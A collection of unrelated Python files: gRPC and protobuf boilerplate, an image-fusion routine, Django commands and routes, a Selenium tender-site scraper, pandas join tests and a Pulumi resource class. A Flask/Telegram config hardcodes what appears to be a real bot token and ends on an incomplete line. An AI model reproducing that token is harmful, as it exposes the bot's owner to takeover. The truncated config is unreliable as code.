self._stubs["test_iam_permissions"] = self.grpc_channel.unary_unary(
"/google.cloud.resourcemanager.v3.Folders/TestIamPermissions",
request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,
)
return self._stubs["test_iam_permissions"]
def close(self):
return self.grpc_channel.close()
__all__ = ("FoldersGrpcAsyncIOTransport",)
|
from typing import Optional
from dexp.processing.filters.sobel_filter import sobel_filter
from dexp.processing.utils.blend_images import blend_images
from dexp.processing.utils.element_wise_affine import element_wise_affine
from dexp.processing.utils.fit_shape import fit_to_shape
from dexp.utils import xpArray
from dexp.utils.backends import Backend, NumpyBackend
def fuse_tg_nd(
image_a: xpArray,
image_b: xpArray,
downscale: Optional[int] = 2,
sharpness: Optional[float] = 24,
tenengrad_smoothing: Optional[int] = 4,
blend_map_smoothing: Optional[int] = 10,
bias_axis: Optional[int] = None,
bias_exponent: Optional[float] = 3,
bias_strength: Optional[float] = 2,
clip: Optional[bool] = True,
internal_dtype=None,
_display_blend_map: bool = False,
):
"""
Fuses two images by picking regions from one or the other image based on the local image quality
measured by using the magnitude of the Sobel gradient -- similarly as in the Tenengrad focus metric.
A smooth blend map is computed that blends the two images based on local image quality. A bias can be
introduced to favor one side of an axis versus another.
Parameters
----------
image_a : First image to fuse
image_b : Second image to fuse
downscale : How much to downscale the two images in order to compute the blend map.
A value of 2 is good to achieve both coarse denoising and reduce compute load.
sharpness : How 'sharp' should be the choice between the two images.
A large value makes sure that most of the time the voxel values of one or the other image
are picked with very little mixing even if local image quality between .
tenengrad_smoothing : How much to smooth the tenengrad map
blend_map_smoothing : How much to smooth the blend map
bias_axis : Along which axis should a bias be introduced in the blend map. None for no bias.
bias_exponent : Exponent for the bias
bias_strength : Bias strength -- zero means no bias
clip : clip output to input images min and max values.
internal_dtype : dtype for internal computation
_display_blend_map : For debugging purposes, we can display the images to fuse, the blend map and result.
Returns
-------
"""
xp = Backend.get_xp_module()
sp = Backend.get_sp_module()
if not image_a.shape == image_b.shape:
raise ValueError("Arrays must have the same shape")
if not image_a.dtype == image_b.dtype:
raise ValueError("Arrays must have the same dtype")
if internal_dtype is None:
internal_dtype = image_a.dtype
if type(Backend.current()) is NumpyBackend:
internal_dtype = xp.float32
original_dtype = image_a.dtype
image_a = Backend.to_backend(image_a, dtype=internal_dtype)
image_b = Backend.to_backend(image_b, dtype=internal_dtype)
min_a, max_a = xp.min(image_a), xp.max(image_a)
min_b, max_b = xp.min(image_b), xp.max(image_b)
min_value = min(min_a, min_b)
max_value = min(max_a, max_b)
del min_a, max_a, min_b, max_b
# downscale to speed up computation and reduce noise
d_image_a = sp.ndimage.interpolation.zoom(image_a, zoom=1 / downscale, order=0)
d_image_b = sp.ndimage.interpolation.zoom(image_b, zoom=1 / downscale, order=0)
# Denoise further:
d_image_a = sp.ndimage.gaussian_filter(d_image_a, sigma=1.5)
d_image_b = sp.ndimage.gaussian_filter(d_image_b, sigma=1.5)
# Compute Tenengrad filter:
t_image_a = sobel_filter(d_image_a, exponent=1, normalise_input=False, in_place_normalisation=True)
t_image_b = sobel_filter(d_image_b, exponent=1, normalise_input=False, in_place_normalisation=True)
del d_image_a, d_image_b
# Apply maximum filter:
t_image_a = sp.ndimage.maximum_filter(t_image_a, size=tenengrad_smoothing)
t_image_b = sp.ndimage.maximum_filter(t_image_b, size=tenengrad_smoothing)
# Apply smoothing filter:
t_image_a = sp.ndimage.uniform_filter(t_image_a, size=max(1, tenengrad_smoothing))
t_image_b = sp.ndimage.uniform_filter(t_image_b, size=max(1, tenengrad_smoothing))
# Normalise:
t_min_value = min(xp.min(t_image_a), xp.min(t_image_b))
t_max_value = max(xp.max(t_image_a), xp.max(t_image_b))
alpha = (1 / (t_max_value - t_min_value)).astype(internal_dtype)
beta = (-t_min_value / (t_max_value - t_min_value)).astype(internal_dtype)
t_image_a = element_wise_affine(t_image_a, alpha, beta, out=t_image_a)
t_image_b = element_wise_affine(t_image_b, alpha, beta, out=t_image_b)
del t_min_value, t_max_value
# Add bias:
if bias_axis is not None and bias_strength != 0:
length = t_image_a.shape[bias_axis]
bias_vector = xp.linspace(-1, 1, num=length)
bias_vector = xp.sign(bias_vector) * (xp.absolute(bias_vector) ** bias_exponent)
new_shape = tuple(s if i == bias_axis else 1 for i, s in enumerate(t_image_a.shape))
bias_vector = xp.reshape(bias_vector, newshape=new_shape)
t_image_a -= bias_strength * bias_vector
t_image_b += bias_strength * bias_vector
del bias_vector
# compute the absolute difference and sign:
diff = t_image_a
diff -= t_image_b
del t_image_b
sgn_diff = xp.sign(diff)
abs_diff = xp.absolute(diff, out=diff)
abs_diff **= 1 / sharpness
del diff
# compute blending map:
blend_map = abs_diff
blend_map *= sgn_diff
blend_map = element_wise_affine(blend_map, 0.5, 0.5, out=blend_map)
del sgn_diff
# Upscale blending map back to original size:
blend_map = sp.ndimage.zoom(blend_map, zoom=downscale, order=1)
# Padding to recover original image size:
blend_map = fit_to_shape(blend_map, shape=image_a.shape)
# Smooth blend map to have less seams:
blend_map = sp.ndimage.filters.uniform_filter(blend_map, size=blend_map_smoothing)
# Fuse using blending map:
image_fused = blend_images(image_a, image_b, blend_map)
if not _display_blend_map:
del image_a, image_b, blend_map
if clip:
image_fused = xp.clip(image_fused, min_value, max_value, out=image_fused)
# Adjust type:
image_fused = image_fused.astype(original_dtype, copy=False)
if _display_blend_map:
from napari import Viewer, gui_qt
with gui_qt():
def _c(array):
return Backend.to_numpy(array)
viewer = Viewer()
viewer.add_image(_c(image_a), name="image_a", contrast_limits=(0, 600))
viewer.add_image(_c(image_b), name="image_b", contrast_limits=(0, 600))
viewer.add_image(_c(blend_map), name="blend_map")
viewer.add_image(_c(image_fused), name="image_fused", contrast_limits=(0, 600))
return image_fused
|
from pathlib import Path
from django.core.management import BaseCommand
from django.core.paginator import Paginator
from grandchallenge.cases.models import Image, ImageFile, image_file_path
class Command(BaseCommand):
def handle(self, *args, **options):
images = (
Image.objects.all().order_by("created").prefetch_related("files")
)
paginator = Paginator(images, 100)
print(f"Found {paginator.count} images")
for idx in paginator.page_range:
print(f"Page {idx} of {paginator.num_pages}")
page = paginator.page(idx)
for im in page.object_list:
for f in im.files.exclude(image_type=ImageFile.IMAGE_TYPE_DZI):
old_name = f.file.name
new_name = image_file_path(f, Path(f.file.name).name)
if old_name == new_name:
print(f"Skipping {old_name}")
else:
print(f"Migrating {old_name} to {new_name}")
storage = f.file.storage
storage.copy(from_name=old_name, to_name=new_name)
f.file.name = new_name
f.save()
storage.delete(old_name)
|
from .pyk4a import *
from .pyk4abt import *
|
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from time import sleep
from selenium import webdriver
from Main.Tenderplan.password import get_passwd
def waiter(expression, method='xpath', delay=7, click=0, event='presence'):
try:
if method == 'xpath':
if event == 'presence':
WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, expression)))
elif event == 'visibility':
WebDriverWait(driver, delay).until(EC.visibility_of_element_located((By.XPATH, expression)))
elif method == 'css':
if event == 'presence':
WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.CSS_SELECTOR, expression)))
if event == 'visibility':
WebDriverWait(driver, delay).until(EC.visibility_of_element_located((By.CSS_SELECTOR, expression)))
if click == 1:
driver.find_element_by_xpath(expression).click()
return True
except TimeoutException:
# print("Loading took too much time!")
return False
def get_participants():
global driver
# запрашиваем пароль к tenderplan.ru
pwd = get_passwd().strip()
driver = webdriver.Firefox()
driver.get("http://tenderplan.ru/account/logon")
username = driver.find_element_by_name("EmailAddress")
password = driver.find_element_by_name("Password")
username.send_keys("zheleznov@innoter.com")
password.send_keys(pwd)
driver.find_element_by_xpath("/html/body/div[1]/div/div[1]/section/div/div/form/div[3]/button").click()
# Жмём "Лиды отработать"
print('Запрашиваем список лидов...')
sleep(2)
waiter("//*[contains(text(), 'Лиды отработать')]", click=1)
# ждём, пока лиды прогрузятся
sleep(3)
# TODO собрать всех участников в сет и устранить дубликаты
# TODO выявить победителя
# TODO добавить ссылку на тендер (берётся из адресной строки)
# TODO экспорт в Excel
counter = 0
seen_companies = set()
participants_list = []
while True:
counter += 1
try:
# Перебираем список лидов, ожидая (visibility), пока прогрузятся новые
waiter(
"//*[@id='slidepanel-left-wrapper']/div/div/div/div[2]/div[" + str(counter) + "]",
click=1, event='visibility')
# Название тендера
tender_name = driver.find_element_by_xpath(
"//*[@id='slidepanel-left-wrapper']/div/div/div/div[2]/div[" + str(counter) + "]/div/div[2]/div[1]").text
print('\nЛид {}: {}'.format(counter, tender_name))
except NoSuchElementException:
print('Конец списка лидов')
break
try:
if waiter('.col-sm-12.notification-title.notification-header-mark', 'css', event='visibility') is True:
# Страница с тендером полностью прогрузилась, можно искать таблицу участников
table_presence_tag = waiter('table.participants-table', method='css', delay=0)
if table_presence_tag is True:
# таблица участников присутствует, обрабатываем
# waiter('table.participants-table', method='css')
table = driver.find_element_by_css_selector(
'.table.table-striped.table-condensed.participants-table>tbody')
print('\n')
partictpats = table.find_elements_by_css_selector('.deflink-button>span')
winner_flag = 0
for x in range(len(partictpats)):
if len(partictpats[x].text) > 0:
# print('=' * 2000)
company = partictpats[x].text.strip()
print(company)
if x + 1 != len(partictpats) and partictpats[x + 1].size == {'height': 16, 'width': 16}:
winner_flag = True
print('Winner!')
else:
winner_flag = False
# if x < len(partictpats):
# print('Curr x: {}, length: {}, x+1: {}'.format(x, len(partictpats), x + 1))
# # размер значка-кубка (всегда идёт элементом списка после названия компании)
# if partictpats[x + 1].size == {'height': 16, 'width': 16}:
# print('Winner!')
if company not in seen_companies:
seen_companies.add(company)
if winner_flag is True:
participant_dict = {'company': company, 'tender_name': [{tender_name: 'win'}]}
elif winner_flag is False:
participant_dict = {'company': company, 'tender_name': [{tender_name: 'par'}]}
participants_list.append(participant_dict)
del participant_dict
else:
for item in participants_list:
if item['company'] == company:
if winner_flag is True:
item['tender_name'].append({tender_name: 'win'})
elif winner_flag is False:
item['tender_name'].append({tender_name: 'par'})
break
else:
print('Таблицы участников нету, переходим к следующему тендеру...')
except (NoSuchElementException, StaleElementReferenceException):
print('{}\nОшибка приполучении списка, пробуем заново...'.format(80 * '='))
# del participant_dict
counter -= 1
# sleep(1)
continue
return participants_list
|
from django.urls import path
from rest_framework.routers import SimpleRouter
from .views import (
CoursesAPIView,
ReviewsAPIView,
CourseAPIView,
ReviewAPIView,
CourseViewSet,
ReviewViewSet
)
router = SimpleRouter()
router.register('courses', CourseViewSet)
router.register('reviews', ReviewViewSet)
urlpatterns = [
path('courses/', CoursesAPIView.as_view(), name='courses'),
path('courses/<int:pk>/', CourseAPIView.as_view(), name='course'),
path('courses/<int:course_pk>/reviews', ReviewsAPIView.as_view(), name='course_reviews'),
path('courses/<int:course_pk>/reviews/<int:review_pk>', ReviewAPIView.as_view(), name='course_review'),
path('reviews/', ReviewsAPIView.as_view(), name='reviews'),
path('reviews/<int:review_pk>/', ReviewAPIView.as_view(), name='review')
]
|
'''Installation scrip run by pip'''
from setuptools import setup, find_packages
setup(
name='competitive_programming_tools',
version='0.1',
packages=find_packages(),
install_requires=[
'click',
'colorama',
],
entry_points={
'console_scripts': [
'cpt = competitive_programming_tools:main',
],
},
)
|
import time
from unittest.mock import patch
import pytest
import requests
from huggingface_hub.hf_api import HfApi
USER = "__DUMMY_TRANSFORMERS_USER__"
FULL_NAME = "Dummy User"
PASS = "__DUMMY_TRANSFORMERS_PASS__"
ENDPOINT_STAGING = "https://moon-staging.huggingface.co"
ENDPOINT_STAGING_DATASETS_URL = ENDPOINT_STAGING + "/datasets/{path}/resolve/{revision}/{name}"
@pytest.fixture(scope="session")
def hf_api():
return HfApi(endpoint=ENDPOINT_STAGING)
@pytest.fixture(scope="session")
def hf_token(hf_api: HfApi):
hf_token = hf_api.login(username=USER, password=PASS)
yield hf_token
try:
hf_api.logout(hf_token)
except requests.exceptions.HTTPError:
pass
@pytest.fixture(scope="session")
def hf_private_dataset_repo_txt_data_(hf_api: HfApi, hf_token, text_file):
repo_name = f"repo_txt_data-{int(time.time() * 10e3)}"
hf_api.create_repo(token=hf_token, name=repo_name, repo_type="dataset", private=True)
repo_id = f"{USER}/{repo_name}"
hf_api.upload_file(
token=hf_token,
path_or_fileobj=str(text_file),
path_in_repo="data.txt",
repo_id=repo_id,
repo_type="dataset",
)
yield repo_id
try:
hf_api.delete_repo(token=hf_token, name=repo_name, repo_type="dataset")
except (requests.exceptions.HTTPError, ValueError): # catch http error and token invalid error
pass
@pytest.fixture()
def hf_private_dataset_repo_txt_data(hf_private_dataset_repo_txt_data_):
with patch("datasets.config.HF_ENDPOINT", ENDPOINT_STAGING):
with patch("datasets.config.HUB_DATASETS_URL", ENDPOINT_STAGING_DATASETS_URL):
yield hf_private_dataset_repo_txt_data_
@pytest.fixture(scope="session")
def hf_private_dataset_repo_zipped_txt_data_(hf_api: HfApi, hf_token, zip_csv_path):
repo_name = f"repo_zipped_txt_data-{int(time.time() * 10e3)}"
hf_api.create_repo(token=hf_token, name=repo_name, repo_type="dataset", private=True)
repo_id = f"{USER}/{repo_name}"
hf_api.upload_file(
token=hf_token,
path_or_fileobj=str(zip_csv_path),
path_in_repo="data.zip",
repo_id=repo_id,
repo_type="dataset",
)
yield repo_id
try:
hf_api.delete_repo(token=hf_token, name=repo_name, repo_type="dataset")
except (requests.exceptions.HTTPError, ValueError): # catch http error and token invalid error
pass
@pytest.fixture()
def hf_private_dataset_repo_zipped_txt_data(hf_private_dataset_repo_zipped_txt_data_):
with patch("datasets.config.HF_ENDPOINT", ENDPOINT_STAGING):
with patch("datasets.config.HUB_DATASETS_URL", ENDPOINT_STAGING_DATASETS_URL):
yield hf_private_dataset_repo_zipped_txt_data_
|
from flask import Flask
from telebot import TeleBot
from flask_sqlalchemy import SQLAlchemy
from FreeKassa import FK
class Config(object):
SQLALCHEMY_DATABASE_URI = 'sqlite:///main.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
kassa = FK()
bot = TeleBot('982289200:AAGs-xuy7PHgsEXDQui4uFATxgOpKHtMlSw')
admins = [865473632]
WEBHOOK_URL = f''
WEBHOOK_LISTEN = ''
WEBHOOK_PORT =
|
import numpy as np
import pytest
from pandas._libs import join as libjoin
from pandas import Categorical, DataFrame, Index, merge
import pandas._testing as tm
class TestIndexer:
@pytest.mark.parametrize(
"dtype", ["int32", "int64", "float32", "float64", "object"]
)
def test_outer_join_indexer(self, dtype):
indexer = libjoin.outer_join_indexer
left = np.arange(3, dtype=dtype)
right = np.arange(2, 5, dtype=dtype)
empty = np.array([], dtype=dtype)
result, lindexer, rindexer = indexer(left, right)
assert isinstance(result, np.ndarray)
assert isinstance(lindexer, np.ndarray)
assert isinstance(rindexer, np.ndarray)
tm.assert_numpy_array_equal(result, np.arange(5, dtype=dtype))
exp = np.array([0, 1, 2, -1, -1], dtype=np.int64)
tm.assert_numpy_array_equal(lindexer, exp)
exp = np.array([-1, -1, 0, 1, 2], dtype=np.int64)
tm.assert_numpy_array_equal(rindexer, exp)
result, lindexer, rindexer = indexer(empty, right)
tm.assert_numpy_array_equal(result, right)
exp = np.array([-1, -1, -1], dtype=np.int64)
tm.assert_numpy_array_equal(lindexer, exp)
exp = np.array([0, 1, 2], dtype=np.int64)
tm.assert_numpy_array_equal(rindexer, exp)
result, lindexer, rindexer = indexer(left, empty)
tm.assert_numpy_array_equal(result, left)
exp = np.array([0, 1, 2], dtype=np.int64)
tm.assert_numpy_array_equal(lindexer, exp)
exp = np.array([-1, -1, -1], dtype=np.int64)
tm.assert_numpy_array_equal(rindexer, exp)
def test_left_join_indexer_unique():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([2, 2, 3, 4, 4], dtype=np.int64)
result = libjoin.left_join_indexer_unique(b, a)
expected = np.array([1, 1, 2, 3, 3], dtype=np.int64)
tm.assert_numpy_array_equal(result, expected)
def test_left_outer_join_bug():
left = np.array(
[
0,
1,
0,
1,
1,
2,
3,
1,
0,
2,
1,
2,
0,
1,
1,
2,
3,
2,
3,
2,
1,
1,
3,
0,
3,
2,
3,
0,
0,
2,
3,
2,
0,
3,
1,
3,
0,
1,
3,
0,
0,
1,
0,
3,
1,
0,
1,
0,
1,
1,
0,
2,
2,
2,
2,
2,
0,
3,
1,
2,
0,
0,
3,
1,
3,
2,
2,
0,
1,
3,
0,
2,
3,
2,
3,
3,
2,
3,
3,
1,
3,
2,
0,
0,
3,
1,
1,
1,
0,
2,
3,
3,
1,
2,
0,
3,
1,
2,
0,
2,
],
dtype=np.int64,
)
right = np.array([3, 1], dtype=np.int64)
max_groups = 4
lidx, ridx = libjoin.left_outer_join(left, right, max_groups, sort=False)
exp_lidx = np.arange(len(left), dtype=np.int64)
exp_ridx = -np.ones(len(left), dtype=np.int64)
exp_ridx[left == 1] = 1
exp_ridx[left == 3] = 0
tm.assert_numpy_array_equal(lidx, exp_lidx)
tm.assert_numpy_array_equal(ridx, exp_ridx)
def test_inner_join_indexer():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
index, ares, bres = libjoin.inner_join_indexer(a, b)
index_exp = np.array([3, 5], dtype=np.int64)
tm.assert_almost_equal(index, index_exp)
aexp = np.array([2, 4], dtype=np.int64)
bexp = np.array([1, 2], dtype=np.int64)
tm.assert_almost_equal(ares, aexp)
tm.assert_almost_equal(bres, bexp)
a = np.array([5], dtype=np.int64)
b = np.array([5], dtype=np.int64)
index, ares, bres = libjoin.inner_join_indexer(a, b)
tm.assert_numpy_array_equal(index, np.array([5], dtype=np.int64))
tm.assert_numpy_array_equal(ares, np.array([0], dtype=np.int64))
tm.assert_numpy_array_equal(bres, np.array([0], dtype=np.int64))
def test_outer_join_indexer():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
index, ares, bres = libjoin.outer_join_indexer(a, b)
index_exp = np.array([0, 1, 2, 3, 4, 5, 7, 9], dtype=np.int64)
tm.assert_almost_equal(index, index_exp)
aexp = np.array([-1, 0, 1, 2, 3, 4, -1, -1], dtype=np.int64)
bexp = np.array([0, -1, -1, 1, -1, 2, 3, 4], dtype=np.int64)
tm.assert_almost_equal(ares, aexp)
tm.assert_almost_equal(bres, bexp)
a = np.array([5], dtype=np.int64)
b = np.array([5], dtype=np.int64)
index, ares, bres = libjoin.outer_join_indexer(a, b)
tm.assert_numpy_array_equal(index, np.array([5], dtype=np.int64))
tm.assert_numpy_array_equal(ares, np.array([0], dtype=np.int64))
tm.assert_numpy_array_equal(bres, np.array([0], dtype=np.int64))
def test_left_join_indexer():
a = np.array([1, 2, 3, 4, 5], dtype=np.int64)
b = np.array([0, 3, 5, 7, 9], dtype=np.int64)
index, ares, bres = libjoin.left_join_indexer(a, b)
tm.assert_almost_equal(index, a)
aexp = np.array([0, 1, 2, 3, 4], dtype=np.int64)
bexp = np.array([-1, -1, 1, -1, 2], dtype=np.int64)
tm.assert_almost_equal(ares, aexp)
tm.assert_almost_equal(bres, bexp)
a = np.array([5], dtype=np.int64)
b = np.array([5], dtype=np.int64)
index, ares, bres = libjoin.left_join_indexer(a, b)
tm.assert_numpy_array_equal(index, np.array([5], dtype=np.int64))
tm.assert_numpy_array_equal(ares, np.array([0], dtype=np.int64))
tm.assert_numpy_array_equal(bres, np.array([0], dtype=np.int64))
def test_left_join_indexer2():
idx = Index([1, 1, 2, 5])
idx2 = Index([1, 2, 5, 7, 9])
res, lidx, ridx = libjoin.left_join_indexer(idx2.values, idx.values)
exp_res = np.array([1, 1, 2, 5, 7, 9], dtype=np.int64)
tm.assert_almost_equal(res, exp_res)
exp_lidx = np.array([0, 0, 1, 2, 3, 4], dtype=np.int64)
tm.assert_almost_equal(lidx, exp_lidx)
exp_ridx = np.array([0, 1, 2, 3, -1, -1], dtype=np.int64)
tm.assert_almost_equal(ridx, exp_ridx)
def test_outer_join_indexer2():
idx = Index([1, 1, 2, 5])
idx2 = Index([1, 2, 5, 7, 9])
res, lidx, ridx = libjoin.outer_join_indexer(idx2.values, idx.values)
exp_res = np.array([1, 1, 2, 5, 7, 9], dtype=np.int64)
tm.assert_almost_equal(res, exp_res)
exp_lidx = np.array([0, 0, 1, 2, 3, 4], dtype=np.int64)
tm.assert_almost_equal(lidx, exp_lidx)
exp_ridx = np.array([0, 1, 2, 3, -1, -1], dtype=np.int64)
tm.assert_almost_equal(ridx, exp_ridx)
def test_inner_join_indexer2():
idx = Index([1, 1, 2, 5])
idx2 = Index([1, 2, 5, 7, 9])
res, lidx, ridx = libjoin.inner_join_indexer(idx2.values, idx.values)
exp_res = np.array([1, 1, 2, 5], dtype=np.int64)
tm.assert_almost_equal(res, exp_res)
exp_lidx = np.array([0, 0, 1, 2], dtype=np.int64)
tm.assert_almost_equal(lidx, exp_lidx)
exp_ridx = np.array([0, 1, 2, 3], dtype=np.int64)
tm.assert_almost_equal(ridx, exp_ridx)
def test_merge_join_categorical_multiindex():
# From issue 16627
a = {
"Cat1": Categorical(["a", "b", "a", "c", "a", "b"], ["a", "b", "c"]),
"Int1": [0, 1, 0, 1, 0, 0],
}
a = DataFrame(a)
b = {
"Cat": Categorical(["a", "b", "c", "a", "b", "c"], ["a", "b", "c"]),
"Int": [0, 0, 0, 1, 1, 1],
"Factor": [1.1, 1.2, 1.3, 1.4, 1.5, 1.6],
}
b = DataFrame(b).set_index(["Cat", "Int"])["Factor"]
expected = merge(
a,
b.reset_index(),
left_on=["Cat1", "Int1"],
right_on=["Cat", "Int"],
how="left",
)
result = a.join(b, on=["Cat1", "Int1"])
expected = expected.drop(["Cat", "Int"], axis=1)
tm.assert_frame_equal(expected, result)
# Same test, but with ordered categorical
a = {
"Cat1": Categorical(
["a", "b", "a", "c", "a", "b"], ["b", "a", "c"], ordered=True
),
"Int1": [0, 1, 0, 1, 0, 0],
}
a = DataFrame(a)
b = {
"Cat": Categorical(
["a", "b", "c", "a", "b", "c"], ["b", "a", "c"], ordered=True
),
"Int": [0, 0, 0, 1, 1, 1],
"Factor": [1.1, 1.2, 1.3, 1.4, 1.5, 1.6],
}
b = DataFrame(b).set_index(["Cat", "Int"])["Factor"]
expected = merge(
a,
b.reset_index(),
left_on=["Cat1", "Int1"],
right_on=["Cat", "Int"],
how="left",
)
result = a.join(b, on=["Cat1", "Int1"])
expected = expected.drop(["Cat", "Int"], axis=1)
tm.assert_frame_equal(expected, result)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: syft_proto/generic/pointers/v1/pointer_dataset.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from syft_proto.types.syft.v1 import id_pb2 as syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='syft_proto/generic/pointers/v1/pointer_dataset.proto',
package='syft_proto.generic.pointers.v1',
syntax='proto3',
serialized_options=b'\n+org.openmined.syftproto.generic.pointers.v1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n4syft_proto/generic/pointers/v1/pointer_dataset.proto\x12\x1esyft_proto.generic.pointers.v1\x1a!syft_proto/types/syft/v1/id.proto\"\xc3\x02\n\x0ePointerDataset\x12\x39\n\tobject_id\x18\x01 \x01(\x0b\x32\x1c.syft_proto.types.syft.v1.IdR\x08objectId\x12=\n\x0blocation_id\x18\x02 \x01(\x0b\x32\x1c.syft_proto.types.syft.v1.IdR\nlocationId\x12O\n\x15object_id_at_location\x18\x03 \x01(\x0b\x32\x1c.syft_proto.types.syft.v1.IdR\x12objectIdAtLocation\x12\x12\n\x04tags\x18\x04 \x03(\tR\x04tags\x12 \n\x0b\x64\x65scription\x18\x05 \x01(\tR\x0b\x64\x65scription\x12\x30\n\x14garbage_collect_data\x18\x06 \x01(\x08R\x12garbageCollectDataB-\n+org.openmined.syftproto.generic.pointers.v1b\x06proto3'
,
dependencies=[syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2.DESCRIPTOR,])
_POINTERDATASET = _descriptor.Descriptor(
name='PointerDataset',
full_name='syft_proto.generic.pointers.v1.PointerDataset',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='object_id', full_name='syft_proto.generic.pointers.v1.PointerDataset.object_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='objectId', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='location_id', full_name='syft_proto.generic.pointers.v1.PointerDataset.location_id', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='locationId', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='object_id_at_location', full_name='syft_proto.generic.pointers.v1.PointerDataset.object_id_at_location', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='objectIdAtLocation', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='syft_proto.generic.pointers.v1.PointerDataset.tags', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='tags', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='description', full_name='syft_proto.generic.pointers.v1.PointerDataset.description', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='description', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='garbage_collect_data', full_name='syft_proto.generic.pointers.v1.PointerDataset.garbage_collect_data', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, json_name='garbageCollectData', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=124,
serialized_end=447,
)
_POINTERDATASET.fields_by_name['object_id'].message_type = syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2._ID
_POINTERDATASET.fields_by_name['location_id'].message_type = syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2._ID
_POINTERDATASET.fields_by_name['object_id_at_location'].message_type = syft__proto_dot_types_dot_syft_dot_v1_dot_id__pb2._ID
DESCRIPTOR.message_types_by_name['PointerDataset'] = _POINTERDATASET
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PointerDataset = _reflection.GeneratedProtocolMessageType('PointerDataset', (_message.Message,), {
'DESCRIPTOR' : _POINTERDATASET,
'__module__' : 'syft_proto.generic.pointers.v1.pointer_dataset_pb2'
# @@protoc_insertion_point(class_scope:syft_proto.generic.pointers.v1.PointerDataset)
})
_sym_db.RegisterMessage(PointerDataset)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ResolverFirewallRuleGroupAssociationArgs', 'ResolverFirewallRuleGroupAssociation']
@pulumi.input_type
class ResolverFirewallRuleGroupAssociationArgs:
def __init__(__self__, *,
firewall_rule_group_id: pulumi.Input[str],
priority: pulumi.Input[int],
vpc_id: pulumi.Input[str],
mutation_protection: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ResolverFirewallRuleGroupAssociation resource.
:param pulumi.Input[str] firewall_rule_group_id: The unique identifier of the firewall rule group.
:param pulumi.Input[int] priority: The setting that determines the processing order of the rule group among the rule groups that you associate with the specified VPC. DNS Firewall filters VPC traffic starting from the rule group with the lowest numeric priority setting.
:param pulumi.Input[str] vpc_id: The unique identifier of the VPC that you want to associate with the rule group.
:param pulumi.Input[str] mutation_protection: If enabled, this setting disallows modification or removal of the association, to help prevent against accidentally altering DNS firewall protections. Valid values: `ENABLED`, `DISABLED`.
:param pulumi.Input[str] name: A name that lets you identify the rule group association, to manage and use it.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
"""
